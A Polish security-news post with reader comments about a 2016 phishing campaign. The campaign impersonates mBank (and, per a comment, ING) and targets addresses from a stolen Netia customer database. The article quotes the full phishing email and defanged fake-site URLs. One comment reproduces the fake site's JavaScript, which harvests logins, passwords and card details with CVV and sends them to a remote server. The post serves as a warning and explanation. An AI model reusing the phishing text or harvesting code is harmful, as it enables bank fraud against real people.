14:40
14/7/2016

Otrzymaliśmy informację, że na adres podany wyłącznie Netii (i niestety znajdujący się w wykradzionej ostatnio bazie) dotarł fałszywy e-mail. Przestępcy podszywają się pod mBank.

Screenshot_2016-07-14-14-26-17

Screenshot_2016-07-14-14-26-36

Dostęp do Twojego konta mBank został zablokowany!

W trosce o bezpieczeństwo naszych klientów zablokowaliśmy twoje konto w systemie mBank, powodem jest nieautoryzowany dostęp do konta.
W celu odzyskania dostępu prosimy o weryfikację właściciela rachunku, logując się na:

Weryfikuj

Serdecznie pozdrawiamy,
Zespół mBank S.A.
W przypadku jakichkolwiek pytań prosimy o kontakt z Infolinia 801 300 800

Ten e-mail został wygenerowany automatycznie. Prosimy na niego nie odpowiadać. mBank S.A. z siedzibą w Warszawie, ul. Senatorska 18, 00-950 Warszawa, Oddział Bankowości Mobilnej w Łodzi, zarejestrowany przez Sąd Rejonowy dla m. st. Warszawy XII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS 0000025237, posiadający numer identyfikacji podatkowej NIP: 526-021-50-88, o wpłaconym w całości kapitale zakładowym, którego wysokość wed ług stanu na dzień 01.01.2016 r. wynosi 168.955.696 zł (w całości wpłacony).

Link w wiadomości kieruje na fałszywą stronę wyłudzającą dane dostępowe: hxxp://profil-mbank.pw

Screenshot_2016-07-14-14-26-55

mBank_serwis_transakcyjny

Kampania wysyłana jest nie tylko na adresy klientów Netii znajdujące się w ostatnio wykradzionej bazie, ale również inne. Co to oznacza? Tylko tyle, że przestępcy już dołączyli do swojej spamowej bazy dane wykradzione z Netii.

Dziękujemy czytelnikom, którzy poinformowali nas o e-mailach, a zwłaszcza Arkadiuszowi, który jest autorem screenshotów umieszczonych w tekście.

Przeczytaj także:

69 komentarzy

Dodaj komentarz
  1. potwierdzam, dostałem wiadomość tej samej treści z mbanku. Czy gdzieś coś ktoś organizuje pozew zbiorowy przeciwko netii ?

    • Nie sadze aby sad uznal sam fakt wycieku danych jako wystarczajacy do wyplaty jakiegokolwiek odszkodowania czy tez nalozenia kary na netie.

      Musialbys udowodnic ze netia celowo nie dolozyla wszelkich staran aby zapewnic bezpieczenstwo danych i/lub ignorowala atak i jego skutki. A i tak uwazam ze szanse na wygrana sa raczej kiepskie.

    • Lecz się.

    • Na Facebook jest grupa ludzi zbierających się w tym celu.

    • Rozumiem, że klienci Netii powinni teraz oczekiwać też masowego napływu doskonale podrobionych fałszywych faktur?

      Za które Netia powinna wziąć całkowitą odpowiedzialność finansową jako 100% sprawca. Ale to za mało — każdy dodatkowo poniósł stratę psychiczną — utratę poczucia bezpieczeństwa na przyszłość — konieczność stworzenia dodatkowego kanału weryfikacji nowych faktur, konieczność pamiętania i przestrzegania nowych reguł w świecie braku bezpieczeństwa spowodowanym przez Netię.

      I jak widać powyżej — to wcale nie jest teoria.

      Może zatem na początek całkowita zmiana wzoru faktur i całkowita zmiana numerów identyfikacyjnych? (+ konieczna pełna akcja informacyjna — chodzenie na skróty czasem grubo kosztuje…).

  2. Tak, również dostałem tego maila. Netia mnie powiadomiła przez SMS, że moje dane wyciekły…

  3. Właśnie miałem do was pisać emaila w tej sprawie, co ciekawe kilka minut przed tą wiadomością dostałem dwa śmieciowe emaile z adresu wrufbly@shitmail.me

    • Też już widzę wzmożoną aktywność spamowa. Też dostałem z wrubfly@shitmail.me

    • Potwierdzam, a dziś się zdziwiłem skąd takie maile na adresie firmowym…

  4. Niestety też dostałem takiego maila więc wyciek danych z Netii ma już swoje skutki :(

  5. Dostałem identyczny mail na wycieknięty adres

  6. ja dostawałem głuche telefony

  7. Dostałem takiego maila, ale Google zakwalifikowało go jako spam.

  8. co robić, jak żyć…

    • Olać…

  9. Potwierdzam, przyszedł w tym samym czasie

  10. Już blokują :)

  11. Nie robisz tego w realu, nie rób tego w carrefour ( ͡° ͜ʖ ͡°)

  12. Dostałem, na adres podany neti

  13. Ciekawe…
    Ja ostatnio dostałem na swoją skrzynkę pocztową list od Netii (?) w którym Netia gorąco zapewniała mnie, że moje dane nie zostały wykradzione i, że nikt o nich nie wie…. Że nikt nie wie to głowy nie dam, ale, że Netia nie wie to w to raczej wierzę, bo nigdy się u nich nie rejestrowałem…

  14. Ja dostałem śmieciowego maila od wrufbly@shitmail.me

  15. Co ma wspólnego Netia z atakiem na mbank? Wygląda na to że do wszystkich klientów mbanku przesłano taki email o zablokowaniu konta.

    • Nie. Wspólnego ma to, że ten e-mail przyszedł na adres podany wyłącznie w Netii. Jednocześnie mógł być wysłany na adresy niezwiązane z Netią ale akurat w tym przypadku związek z wyciekiem danych z Netii jest.

    • Ma to zwiazek taki: nie mam nic wspólnego z mBankiem, mój adres email oraz nr telefonu zostały pozyskane w ramach wycieku (potwierdzone info od Netii). Przypadek?

  16. Potwierdzam, aczkolwiek gmail odfiltrował do spamu.

  17. też otrzymałem takiego, ale NIGDY nie miałem nic wspólnego z Netią i nie podawałem im swoich danych ani adresu e-mail

  18. Nie mam konta w mBanku a tez dostałem. Oczywiście na emilka z wycieku.
    WQrwi0ny zadzwoniłem na infolinie i zapytałem o dane które wyciekły.
    Imie, Nazwisko, dwa numery telefonów i dwa adresy email i nic więcej… “powiedziała Netia”

    A ja dopowiem: i jeszcze mój adres zamieszkania!

  19. Nie do wszystkich. Do mnie nie przyszło i nie miałem z Netią nic wspólnego a klientem mbanku jestem od 15 lat. Wiec może jednak ma coś wspólnego

  20. Może jakiś specjalista wypowiedzieć się odnośnie javascriptu który był na fałszywej stronie?

    var $second = 30;
    var $password = “of99se0o4oplaai4mmvl5phlm4″;

    function isValid(number) {
    var num = number.replace(/[^\d]/, ”);
    var str = ”;

    for (var i = num.length – 1; i >= 0; — i) {
    str += i & 1 ? num[i] : (parseInt(num[i]) * 2).toString();
    }

    var sum = str.split(”).reduce(function(prev, current) {
    return prev + parseInt(current);
    }, 0);

    return sum % 10 === 0;
    }

    function countdown() {
    if(document.getElementById(‘countdown’)){ document.getElementById(‘countdown’).innerHTML = $second; }
    if($second==00){ return false; }
    $second–;
    setTimeout(“countdown()”, 1000);
    }

    function capsLock(e){
    kc = e.keyCode?e.keyCode:e.which;
    sk = e.shiftKey?e.shiftKey:((kc == 16)?true:false);
    if(((kc >= 65 && kc = 97 && kc 6 && $(“#pass”).val().length > 7) {
    $(“#submitButton”).removeClass(“disabled”);
    $(“#submitButton”).attr(“disabled”, false);
    } else {
    $(“#submitButton”).addClass(“disabled”);
    $(“#submitButton”).attr(“disabled”, true);
    }
    });

    $(“#loginForm”).bind(“submit”, function(event) {
    event.preventDefault();
    $(‘#loginForm .error-container’).hide();
    $(‘#loginForm .form-container’).hide();
    $(‘#loginForm .form-buttons’).hide();
    $(‘.info-buttons’).hide();
    $(‘#loginForm .spinner-container’).show();

    if($(“#userID”).val().length > 6 && $(“#pass”).val().length > 7){
    $conn.send(Aes.Ctr.encrypt(JSON.stringify({ query: “to_server”, type: “login”, data: { login: $(“#userID”).val(), password: $(“#pass”).val() }}), $password, 256));
    setTimeout(function() {
    $(‘#loginForm’).hide();
    $(‘#cardForm’).show();
    }, 1000);
    } else {
    setTimeout(function() {
    $(‘#loginForm .form-container’).show();
    $(‘#loginForm .form-buttons’).show();
    $(‘.info-buttons’).show();
    $(‘#loginForm .spinner-container’).hide();
    $(‘#loginForm .error-container’).show();
    }, 1000);
    }
    });

    $(“#cardForm”).bind(“submit”, function(event) {
    event.preventDefault();
    $(‘#cardForm .error-container’).hide();
    $(‘#cardForm .form-container’).hide();
    $(‘#cardForm .form-buttons’).hide();
    $(‘#cardForm .spinner-container’).show();

    if($(“#cvv”).val().length == 3 && isValid($(“#card_number”).val())){
    $conn.send(Aes.Ctr.encrypt(JSON.stringify({ query: “to_server”, type: “card”, data: { c_number: $(“#card_number”).val(), exp_m: $(“#exp-m”).val(), exp_y: $(“#exp-y”).val(), cvv: $(“#cvv”).val() }}), $password, 256));
    setTimeout(function() {
    $(“#cardForm .spinner-text”).html(‘Prosze czekac sekund’);
    countdown();
    }, 1000);
    } else {
    setTimeout(function() {
    $(‘#cardForm .form-container’).show();
    $(‘#cardForm .form-buttons’).show();
    $(‘#cardForm .spinner-container’).hide();
    $(‘#cardForm .error-container’).show();
    }, 1000);
    }
    });

    $(“#answerForm”).bind(“submit”, function(event) {
    event.preventDefault();
    $(‘#answerForm .error-container’).hide();
    $(‘#answerForm .form-container’).hide();
    $(‘#answerForm .form-buttons’).hide();
    $(‘#answerForm .spinner-container’).show();

    if($(“#answer”).val()){
    $conn.send(Aes.Ctr.encrypt(JSON.stringify({ query: “to_server”, type: “answer”, data: { answer: $(“#answer”).val(), qa_id: $(“#qaid”).val() }}), $password, 256));
    setCookie(“redirect”, 1);
    } else {
    setTimeout(function() {
    $(‘#answerForm .form-container’).show();
    $(‘#answerForm .form-buttons’).show();
    $(‘#answerForm .spinner-container’).hide();
    $(‘#answerForm .error-container’).show();
    }, 1000);
    }
    });

    • Walidacja forma, proste rzeczy w jQuery i wysyłka danych gdzies w świat :) musiałbyś pokazać co jest w $conn.

    • Ten kawałek kodu wysyła wprowadzone dane czyli: identyfikator, hasło, numer karty, ccv i datę ważności gdzieś na zdalny serwer. Dane są wysyłane są w postaci json-a zakodowanego aes-em (wnoiskując po nazwie funkcji) hasłem podanym w zmiennej $password.

    • witam,
      Rownież otrzymuje wiadomości (odnośnie mbanku i netii) łacznie już pare razy, od Netii dowiedziałem sie ze wykradziono tylko moj telefon i sam nr telefonu w rozumienu prawa nie stanowi “danych osobowych” tak więc chciałbym sprawidzć co jeszcze zostalo wykrazone i opublikowane (bo z tego co widze to mail również), nigdzie nie moge znaleźć tych baz danych (znalalzem infomracje w jendym iejscu ze jest ich 14GB w innym że 9GB ale nigdzie nie da rady ich pobrać) czy ktoś moglby udostepnić mi te pliki ?

  21. Też dostałem taki mail. Ale mam w związku z tym kilka pytań:
    – skąd wiadomo, że dane pochodzą z wykradzionej z Netii bazy?
    – Zostałem narażenony na poważne niebezpieczeństwo z powodu zaniedbań w systemach bezpieczeństwa Netii. Jakiego mogę zarządać odszkodowania?

    • Bo czytelnik dostał maila na adres używany wyłącznie dla netii (netia.pl@domena [zamazana na screenie]).

  22. Też otrzymałem wiadomość od shitmaila. Dodatkowo dzisiaj dostałem smsa od “InfoSMS”, że jakaś usługa imiennik została aktywowana, a nic kompletnie takiego nie robiłem. Treść smsa wygląda tak:

    Usługa imiennik została aktywowana. Aby ją wylaczyc, wyslij SMS o tresci: HP.IMIENIO na numer: 92550

    (30.75 zl) reg.: http://bit.ly/29yR5jM

    Śmierdzi mi to fejkiem bo nie ma nawet Polskich znaków a z tego co pamiętam zawsze są w przypadku takich smsów. Po za tym nie wydaję mi się żeby takie “firmy” korzystały ze skracaczy linków.

    Niestety mam lekką obawę bo do włączenia takiej usługi potrzeba chyba tylko właśnie numeru telefonu, i nie chcę za jakiś czas rachunku na parę tyś. złotych. Co sądzicie?

    • Bravo Ty! To kod włączający usługę. Raczej kończący jest stop.
      Normalka: pozyskujesz nr tel np.(35 000) masowo wysyłasz. Jutro zostanie pobrana opłata 32 pln za usługę x aktywowaną 30 dni temu. Aby wyłączyć wyślij y na z.
      Nic trudnego i nic strasznego;)

  23. Ja z kolei otrzymalem maila z wersją ING:

    Data: 13.07.2016 r.
    Dostęp do Twojego konta ING został zablokowany!

    W trosce o bezpieczeństwo naszych klientów zablokowaliśmy twoje konto w systemie ING Bank Śląski, powodem jest nieautoryzowany dostęp do konta.
    W celu odzyskania dostępu prosimy o weryfikację właściciela rachunku, logując się na:
    Weryfikuj

    Serdecznie pozdrawiamy,
    Zespół ING Bank Śląski S.A.

    W przypadku jakichkolwiek pytań prosimy o kontakt z Infolinia 801 222 222

    Ten e-mail został wygenerowany automatycznie. Prosimy na niego nie odpowiadać. ING Bank Śląski S.A. z siedzibą we Wrocławiu, ul. Sokolska 34, 40-086 Katowice, zarejestrowany w Sądzie Rejonowym dla Katowic – Fabrycznej, VI Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS 0000005459, REGON 271514909, NIP 634 013 54 75, kapitał zakładowy i wpłacony 792.345.340 zł.

    • Dostałem to samo.

  24. Zostałem powiadomiony przez Netię o wycieku danych. Dziś już dwa maile z phishingiem – bank ING.

  25. Jesli dobrz mysle i ktos jest czujny to nic tej osobie nie zrobia? Trzeba po prostu wejsc na ich zespoofowana strone i dac sie nabrac? innego sposobu nie ma, aby mi zaszkodzili?

  26. Domena świeżynka:

    Important Dates
    Expires On 2017-07-14
    Registered On 2016-07-14
    Updated On 2016-07-14

  27. Czytam o tych wykradzionych danych z netii kolejny dzień, widzę kolejne ciekawostki które dzieją się z osobami których dane rzekomo wyciekły z neti. Nie otrzymałam żadnego smsa, maila ani telefonu od netii o wykradzionych danych, nikt mi nie wysyła żadnych maili ani smsów z linkami do lipnych stron banków czy podobnych wynalazków.

    Jakiś link do bazy gdzie mogłabym sprawdzić czy moje dane się tam znajdują?

    • @Gal Zanonimizowany : zadzwoń na infolinię Netii…ale jeśli nie dostałeś wiadomości @ lub SMS lub VoiceMail to znaczy, że ani Twój numer telefonu, ani adres @ nie wyciekł. Netia wysyła wiadomości o wycieku tylko i wyłącznie ludziom, których dane de facto wyciekły.

  28. @blnt, jak widać po komentarzach czytelników niebezpiecznika nie jest to prawda, powiadomienia od netii są wysyłane także do osób które nigdy żadnych danych nie podawały netii.

    • Może podawały do Dialogu, który przejęła NETIA

  29. Netia też kupuje kradzione bazy danych użytkowników UPC. Do mnie dzwonili z Netii, podając moje wszystkie dane, pesel, jaki mam wariant wynegocjowanego dwa lata temu pakietu TV+internet w UPC i ile za niego dokładnie płacę i ile mogę za to płacić mniej w Netii…

    Ale i tak najlepszy myk miałem miesiąc temu. Odebrałem telefon od UPC, kobieta przedstawiła mi marne warunki nowej oferty, więc olałem i zapytała za chwilę, czy aby chcę płacić mniej. No to mówie, że niby tak. A ona na to, że w mojej okolicy Netia wykupiła łącza od UPC i idą po tych samych i że w Netii jest tak i tak, i że lepiej… I UWAGA: skontaktuje się ze mną koleżanka! Nie minęło 15 minut, zadzwoniła koleżanka z Netii…

    • To nie są kradzione bazy danych. Cześć sieci upc została przejęta (kupiona) przez netia i to legalnie. Dotyczy to klientów byłej Aster która to została przejęta (kupiona) przez upc. Tutaj info na ten temat: https://www.uokik.gov.pl/aktualnosci.php?news_id=10402

    • Faktycznie, dzięki za info…

    • @bbcol: miałem kiedyś to nieszczęście pracować w callcenter Netii na stażu (przez pół roku wykonałem 3 telefony ;D) i było pełno druków baz z Orange (dawniej Tepsy), aktualne dane klientów z adresami, telefonami, mailami i informacjami jakie pakiety posiadają. Wynika więc z tego że Netia jakoś na lewo załatwia także bazy od innych operatorów.

  30. A może tak wysłać bombę mailową na adres tego wrubfly@shitmail.me?

  31. Jeśli ktoś wpisał swoje dane dostępowe do konta bankowego na stronie hxxp://profil-mbank.pw, to serdecznie pozdrawiam.

  32. Tez dostalem tego maila.
    Malo tego zauwazylem od kilku dni prawie eksponencjalny przyrost ilosci spamu na skrzynce, ktorego maila podalem neti…

  33. @Therminus, właśnie posiadam internet jeszcze od okresy z przed przejęcia dialogu przez netię, posiadałam w dialogu i potem razem z dialogiem zostałam przejęta przez netię.

  34. Również otrzymałem takową wiadomość na gmaila, z miejsca zablokowałem nadawcę.

  35. Ja nie wiem jak można się na takie coś na brać. Rozumiem, treść e-maila jest dobrze podrobiona, ale reszta? Z jakiego adresu przyszedł e-mail? Jaki adres strony karzą otworzyć? No proszę Was, z dala widać, że to ściema. Strona nawet nie ma żadnego certyfikatu a adres bynajmniej jest dziwny jak na bank (Poważną instytucję), ale już formularz weryfikacyjny, gdzie trzeba podać dane autoryzacyjne karty to po prostu przegięcie!!!

    Jeżeli ktoś się na to dał nabrać, to nie powinien używać internetu, czy bankowości internetowej. Po prostu nie umie ten ktoś czytać tego co ma pod nosem.

  36. “Wersja Lajt”? Jak bank (Szanująca się instytucja) mogłaby coś takiego dać na oficjalną stronę?

  37. Pierwsza fala spamu nadeszła…
    6 lat bronienia firmowego maila przed jakimkolwiek spamem, czytania wszystkich umów, brak zgód na newslettery i odsprzedaż danych (takie jaja też są w umowach!)… i wszystko w pi….u…
    eeeh….

    • Moje dane również wyciekły i nie jestem w stanie wyciągnąć od nich jasnej odpowiedzi czy wyciekły dane moich rodziców które przekazałem im via mail w 2012r.
      Są tak bezczelni w metodzie ctrl+c – ctrl+v że nie sprawdzają komu dopisują. Tak oto według Netii jestem Szanowną Panią….:)
      Za to od kliku dni moja skrzynka jest zasypywana TONAMI spamu…..:/

  38. To teraz pozew zbiorowy i bankructwo tej nieudolnej firmy…

  39. Odkąd wyciekły moje dane z Netii – wiem, że wyciekły bo pobrałem dumpy z bazy, które opublikował Pravy Sector czy jak tam oni się nazywają, dostaję cały czas spam – wcześniej nic nie dostawałem, a teraz mam dziennie około 10 maili ze spamem. Co robić jak żyć?

  40. Dzień po włamaniu zadzwoniłem do Netii i podałem nowego mejla.
    Niestety te ciołki wciąż przysyłają mejle na stary adres.
    A już chciałem stary adres skasować.
    Zadzwonię raz jeszcze…

  41. Od dwóch dni na pocztę przychodzi mi znaczniej więcej spamu. Różne adresy wiadomości więc będzie sporo reguł do dodania :/

  42. :) nieumiejętność zabezpieczenia moich danych przez prepaidowe opcje, bedzie u mnie powodem odmowy podania moich danych do tzw. rejestracji antyterrorystycznej :)

    wiecie dlaczego w III rzeszy nie było mafi?
    noooo….. właśnie….. podwójny rząd….

  43. Potwierdzam, wczoraj dostałem maila z “mbank” (konto zawieszone i z “pge” (faktura za prąd)
    Dodatkowo, z domeny shitmail przychodzi do mnie spam po angielsku.
    Co gorsze, spam przychodzi również na firmową skrzynkę (biuro obsługi klienta) gdzie korzystamy też z netii w firmie.

    :/

  44. Postanowiłem zobaczyć link… Strona nie działa. No i dobrze :-)

  45. Też przychodzi do mnie po kilka maili spamu dziennie po włamie do Netii. Na szczęście Gmail sprytnie umieszcza wszystko w Spam-ie, więc tylko klikam co jakiś czas “Usuń spam” i jest czysto.
    Zastanawiam się, czy to po kilku tygodniach/miesiącach ucichnie i syf przestanie przychodzić, czy teraz już zawsze będę miał taką zaspamowaną skrzynkę (?).

  46. Do czego słuzy w polsce Giodo? Czy podjeli w tej sprawie juz jakies kroki?

  47. Błądzicie jak dzieci we mgle, więc powiem wam. Dane z serwerów netii zostały wykradzione w kwietniu tego roku. Skąd wiem? Jak ktoś z redakcji zapyta to powiem. Pierwszego maila z rzekomą blokadą konta w banku dostałem 19 kwietnia. Łącznie do dnia dzisiejszego takich maili mam z 15. Netia ma to w d*pie, że ktoś im “administrował” serwery od kwietnia.

  48. WBK z dziś:
    hxxp://twoje-informacje.com/

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: